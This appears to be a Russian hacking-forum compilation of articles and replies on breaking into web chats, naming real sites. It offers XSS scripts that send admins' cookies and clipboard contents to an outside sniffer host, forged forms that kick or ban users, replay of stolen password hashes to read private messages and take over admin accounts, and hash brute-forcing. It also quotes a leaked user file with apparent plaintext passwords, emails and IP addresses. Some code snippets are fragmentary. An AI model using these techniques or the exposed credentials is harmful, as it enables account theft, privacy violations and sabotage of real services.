.:] Статьи [:.....................

.::Главная::.

Гостевая

Hack $oft

.::Практика взлома чатов::.

Многие считают, что чаты на xakep.ru, gameland.ru, xyligan.ru практически неломаемые. Они не пропускают символы :"'#%^&>< , что не дает нам возможность вставить скрипт . Мои знакомые Saмец и infantry из команды MadFuckerz нашли следующую уязвимость: Если, допустим, в поле «КОМУ» ввести что-то вроде %%%, то в чате отправителю придет приватное сообщение «Лично вам: Получатель %%% не найден».Заметьте, знак процента ЗАПРЕЩЕН в чате. Таким образом туда можно вставлять любые теги и скрипты, которые будут возвращаться отправителю то есть ТЕБЕ в виде приватного сообщения. Казалось бы, а какой толк от этого, если это только на меня действует? Так вот… в чате сидят такие нехорошие ребята, которые называются АДМИНАМИ, и которые смотрят все приваты. Догоняешь мысль? Помимо тебя скрипт получит админ. Можно вставить практически любой скрипт из статьи Алгола. Но лучше всего вставить такой скрипт:

Исходный код

parent.keyboard.document.kbd_form.recipient.value="ИМЯ_ЖЕРТВЫ";

parent.keyboard.document.kbd_form.text.value="СООБЩЕНИЕ";

parent.keyboard.document.kbd_form.submit();

</script>

В качестве сообщения устанавливается значение /kick. А если вы хотите забанить весь чат на 3 дня, то /ban *. Поясняю: админы и модеры выкидывают из чата командой /kick, которую посылают в приват юзеру. Командой /ban 127.0.0.1 Админ может забанить указанный ip на 3 дня.

Готовая форма:

Исходный код

<html> <head> <title>MadFuckerz</title></HEAD>

<font size=4 color="#DC0000" face=impact>AntiAdmin</font> <br>

<input type="text" name="recipient" value="СКРИПТ СЮДА">Сообщение<br>

<font size=3 color="#DC0000" face=impact>ЗаПаДлО</font> </table></form> </BODY> </HTML>

Поясняю: Вместо надписи "Твой CODE" вставляем содержимое своего кода в чате . Вместо xakep можно вставить gameland и xyligan, но тогда придется поменять и form action= ... В recipient вставляем любой скрипт. Там где сообщение пишем любую фразу.Пустой строчку оставлять нельзя. Можно сделать проще - использовать программу CrakChat. С помощью этой уязвимости мы узнаем ip админа, для последующего бана. Лучше банить всю его сетку командой /ban 111.111.111.* (для сетки)

Скрипт:

Исходный код

img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

Логи смотрим на http://antichat.ru/sniff/log.php. В добавок с ip и referer мы получаем содержимое его кукисов, где находятся такие "важные" для нас параметры, как цвет и ник .Продолжая расширять возможности данной баги, я неожиданно вспомнил: когда я сидел под админом, то всегда копировал пароль в буфер обмена (он имел вид /546378291). Так что нам мешает получить буфер админа чата ? Вставляем такой скрипт:

Исходный код

main.lat.focus();

main.lat.document.execCommand("Paste");

var i=new Image;

i.src='http://antichat.ru/cgi-bin/s.jpg'+'?'+main.lat.value;</script>

Он должен создать небольшое окошко, в которое вставиться содержимое твоего и админовского буфера обмена. Лично у меня выдавало ошибку при компиляции javascript. Не знаю, как будет у вас. В любом случае, попробовать стоит. Лог файл: http://antichat.ru/sniff/log.php

Черпак

Лом чат by ~Ice_night_BeTeP~ Даров хацкер ! Всё ещё сидишь

на обломе потому что модер Вася тебя кикнул ? Как бы отомстить ему ...

Пароль свой он на все твои усиля тебе усиленно не говорит .А может мы и без спросу возьмём ?Итак поехали !

1 . Обзор уязвимостей .

Конечное самая больльшая уязвимость в чатах это действие тэгов в чатах где эта возможность на 100% прикрыта ( я такие даж не встречал ) взлом затягивается и требует применить более сложные варианты . Все примеры я буду описывать на простом среднестатистическом чате назовём егоhttp://www.chat.ru следует добавить что уязвимости будут описаны в чатах PhpMyChat .Начнём с простого . Для начала ищем какие тэги бут приниматся чатом обычно это что то вроде : \x3cfont color=#800080\x3e 123 \x3c/font\x3e ну что кто нить увидел тут знакомое ?Правильно это перекодированый тэг <font color=#800080> 123 </font>Вот мы изменили цвет сообщений . Если ты читаешь это что бы научится использовать тэги то можешь идити курушить чат , мы же с вами пойдём дальше .Бывает что чат не пропускает такой тэг ( ну аж тэги со знаками < ; > даже в самам убитом чате не катят).Тогда можно попробовать так \\x3cfont color=#800080\\x3e 123 \\x3c/font\\x3e есть чаты которые пропускают тэги ввиде \\76font color=#800080\\78 123 \\76/font\\78 ( Я точно не помню каие цифры .Если это твой случай смотри на форуме ) Спообов написания очень много и каждый может найти свой для своего чата . Но всё же чаще всего пропускаются вот такие тэги : \x3cfont color=#800080\x3e 123 \x3c/font\x3e .Если ты хочешь сам создать тэг из любого html тэга то запомни \x3c = <; \x3e = > ; \x3a = : ; Но как использовать способность пропускать тэги в чат нам ? Очень просто ! Допустим нам надо пароль модера Васи На анитчате есть снифер , я говорю о тэгах, Страничка со снифером в расширении .jpg . 1+2+3= Мы должны написать тэг который выводит каритнку ( догадались какую ? )) Тэг это очень простой для тех кому лень делать енто самому вот он : \x3cimg src="http\x3a//antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e . Теперь все чатланцы у нас на крючке . Открой лог снифера и ты увидишь что то подобное этому :

[Mon Aug 16 13:46:01 2004]IP: 212.44.64.110 REFERER: http://www.chat.ru/index.php?showtopic=232&st=100QUERY: CookieIp=212.44.64.110; hotlog=1; session_id=4c90b06a09398290533bb68ed3d3067e; member_id=133;

pass_hash=2a9ea35253dbec60e76166ec8420fbda;

topicsread=a:13:{i:33;i:1092649127;i:616;i:1092649397;i:232;i:1092649558;i:

433;i:1092646760;i:580;i:1092646763;i:430;i:1092646827;

i:588;i:1092646852;i:596;i:1092646877;i:585;i:1092646879;i:486;i:1092646969;i:555;i:

1092647046;i:473;i:1092647622;i:31;i:1092648000;};forum_read=a:1:{i:10;i:1092647059;}

Нас же интересует только hash=2a9ea35253dbec60e76166ec8420fbda берём енто и меняем на

hash:2a9ea35253dbec60e76166ec8420fbda сохраняем в болокноте . Теперь качаем с анитичата прогу MD5Inside жмём открыть и указываем путь к нашему пределаному хэшу . Теперь зпходим Search>Mask attack>options и выбираем как будем брутить . Чаще весго пароль это цифры .Но всё же этот метод долг и эфективен только если пароль из цифр . О другом методе я раскажу дальше .

2. Читаем приват .

Не знаю как тебе но мне всегда хотелось почитать что говорят другие . Тогда я понял нада чиать приват . После поиков я наткунился на скрипт такого содержания :

<INPUT TYPE="hidden" NAME="sent" VALUE="4">]

Нам он конечно в таком виде не подойдёт поэтому открываем блокнот и начинаем его править .

<FORM ACTION="http://www.deafnet.ru/chat/index.phtml" METHOD="Post" AUTOCOMPLETE="ON"> это мы заменяем на : <FORM ACTION="http://www.chat.ru/index.php"METHOD="Post"AUTOCOMPLETE="ON">

Так URL чата указали идём дальше .

<INPUT TYPE="hidden" NAME="From" VALUE="index.phtml"> правим на <INPUT TYPE="hidden" NAME="From" VALUE="index.php">

Потом <INPUT TYPE="hidden" NAME="L" VALUE="russian"> так и оставляем ( енто язык чата )

<INPUT TYPE="hidden" NAME="U" VALUE="kristi"> - указываем ник

<INPUT TYPE="hidden" NAME="R" VALUE="Общая"> - выбираем комнату ( я советую выбирать ту комнату где жертва тогда мы "вселимся" в неё )

<INPUT TYPE="hidden" NAME="PWD_Hash" VALUE="1fbfb23351e3580651395ab721f5e935"> - хэш жертвы как добыть я уже говорил .

<INPUT TYPE="hidden" NAME="Ign" VALUE="Kristi"> - повторем ник

Запускаем . Давим пимпу читать приват и о чудо ! Мы читаем приват !!!

3. Самый эфективный взлом паса

Тебя наверное банили плохие админы ... доводили ковраные модераторы ...в своих мкчтах ты дкмал что если бы ты был админом то бывший админ сидел бы с простым ником а модеры в бане .Эх... как енто всё прекрасно . Но давай воплотим всё это в жизнь ! Для начала что бы забанить модеров , удалить базу пользователей , удалить комнату , посмотреть инфо о юзверях мы должны попасть а админку . Давим правую кнопку крыски и сохраняем html админки на харде , он выглядит примерно так :

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><HTML dir="LTR"><HEAD><TITLE>Чат Ночного Странника</TITLE><LINK REL="stylesheet" HREF="config/style.css.php3?Charset=windows-1251&medium=10&FontName=" TYPE="text/css"><script TYPE="text/javascript" LANGUAGE="JavaScript1.1"><!--function get_focus(){

window.focus();

document.forms['LoginForm'].elements['AUTH_USERNAME'].focus();

}

// -->

</SCRIPT></HEAD><BODY bgcolor="#CCCCCC" background="/images/bg.gif" onLoad="if (window.focus) get_focus();">

Ваш ник :</TD>

<TR><TD ALIGN="RIGHT" VALIGN="TOP" NOWRAP>Ваш пароль :</TD><TD VALIGN="TOP">

</TD></TR></TABLE><P><INPUT TYPE="submit" VALUE="Входим" class="button"></TD></TR></TABLE></FORM></CENTER>

</BODY></HTML>

И как всегда мы запускаем туда свою фантазию и начинаем править всё енто .Для начала правим URL вот что у нас получится :

<FORM ACTION="http://www.chat.ru/admin.php3?L=russian&Link=1" METHOD="POST" AUTOCOMPLETE="OFF" NAME="LoginForm"> Теперь правим ник :

<INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="ADMINISHE"> ( пример )

Теперь наконец пароль :

Для тех кто в танке 0907a906d4eececb2c41f6a412cdf788 это опять хэш только админа !

Дело в том что ты скажешь можно и в поле пароль и так прописать хэш и всё ! Я тоже так когда то думал но ошибался . Хэш это пароль в зашифровном виде так как когда мы вводим пароль и давим вход то пароль шифруется в html отправляется на какой то URL где он проверяется и если он не верный то нам приходит сообщение "Неправильный ник или пароль"

но если паравильный мы в админке ! Значит всё что нам надо просто ввести хэш ( он же зашифровный пароль ) в html и всё ! Мы в админке . Что делать там ты наверное сам разберёшся . Мембер из нашей тимы BUGI таааааково там наделал что чат уже месяц не работает )) . Так злой модер Васька уже забанен чат изуродован , но всё же так охото стать админом !

Что бы всех банить налево и направо что бы все боялись ! Это очень просто ! Созраняем html

егистрации профайла на винте приавим там всё как указоно выше . Уррра мы у админа редактим профайл ! Меняем там пас и логин и тд ( на вкус и цвет ) . Всё ты админ !!!! Только я советую админить в чатах где админ появляется редко примерно раз 2 месяца тогда ты будешь админить столько же ( до его появления ) . Обычно взлом админа и админство в чате когда старый админ в чате равняется ~20 минутам . Они перехватывают обратно ник ! Как я даже сам ещё не понял ( . Но после такого прикола админ обычно закрывает чат недельки на две ( иногда больше ) . Теперь результат !

1. Мы хотели напакастить в чате мы это сделали .

2. Хотели читать приват читаем .

3. Хотели наказать модера наказали .

4. хотели стать админом стали .

5. И просто убили чат !

HOBBIT

Объясните мне plz, что я делаю не так. Я захожу на страницу чата, где нужно вводить ник и цвет и т.п. Просматриваю HTML в блокноте и сохраняю с расшерением html. Потом захожу на сохранённую на хард страницу и при помощи блокнота просматриваю html страницы. Там в поле form action пишу полностью адрес чата. Заменяю form action="chat_enter.xhtml на form action="www.chat.ru/chat_enter.xhtml. Потом нахожу поле отвечающее за цвет сообщения и ника. И заменяю тег select на input. Поля "Название чата", "Время обновления", "Количество выводимых строк" я трогать не стал, потому как слегка не во всё врубаюсь. Если там надо что-то заменить, то подскажите. Теперь я могу не выбирать цвет, а вводить. В поле ника и цвета пишу "';% и пр. закорючки. Чат не пропускает символ `. А со всеми остальными символами заходит нормально. Допустим я хочу написать на чате 12 размером шрифта и красным цветом. Куда мне нужно вставлять скрипт? Непосредственно в поле ввода сообщения или в HTML страницы?

Morph

Мне кажется Что надо вводить red size=30(например) в поле цвета где у тя выбирать не получается

HOBBIT

Не, допустим надо вставить скрипт onerror. Куда его надо впихнуть?

Че Гевара

Взлом чата на http://www.chayan.ru

Теперь мы рассмотрим пример взлома популярного движка COSMO-CHAT.

Скачав исходники чата, и прочитав файл помощи мы находим такую строчку:

Цитата

Логин администратора: Admin (не подлежит изменению!!!)

Пароль администратора по умолчанию: 111

Это нам на руку. Могу вас уверить: из 20 рассмотренных чатов, 5 из них будут с дефолтными паролями.

Ну а что, если пароль другой ? Есть такое понятие, как .htaccess

.htaccess – это файл, в котором можно задавать настройки веб-сервера для каталога, в котором этот файл лежит и его подкаталогов. Настройки, не упомянутые в .htaccess, будут определяться исходя из настроек сервера "по умолчанию" и настроек, указанных в вышележащих .htaccess. Пожалуй, наиболее часто .htaccess используется для ограничения доступа к определенным каталогам и файлам сайта.

Т.е. так мы можем ставить запрет на просмотр файла извне.

Так и должно быть по уму, но админы www.chayan.ru видимо забыли установить права chmod 666 файлу logins.php.

Это тоже нам на руку, т.к. мы из браузера можем читать эту папку!

Открыв файл http://www.chayan.ru/chat/logins.php мы получаем базу зарегистрированных юзеров c их настройками цвета, e-mail'ами и ip адресами:

Исходный код

Admin|Kmq17Yew|mirhost@mail.ru|*m*|admin|*on*|#00ff00|В чат входит|покидает чат|/a|81.25.164.10|10|Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)|*^*|18.06.2004 - 16:09:25 guest|sakina|lk@mail.ru|*m*|user|*on*|#000000|В чат входит|покидает чат|/a|81.25.164.10|-|Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)|*^*|18.06.2004 - 17:00:54 min|111|wafa@list.ru|*m*|user|*on*|#000000|В чат входит|покидает чат|/a|81.25.164.10|-|Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)|*^*|

Как вы видите, пароли хранятся незашифрованными ...

Логин - Admin

пароль - Kmq17Yew

E-mail mirhost@mail.ru

Все, заходим в чат и вершим правосудие ;)

Кстати, некоторые юзеры не могут в своей голове держать много паролей, и поэтому нередкость - пароль на вход в чат совпадает с паролем на e-mail ...

Так, что если вы хотите убереч свой cosmo-чат от взломов такого рода, то запретите на просмотр файлы

- logins.php

- banvoice.php

- banip.php

- banlogin.php

- tmp.php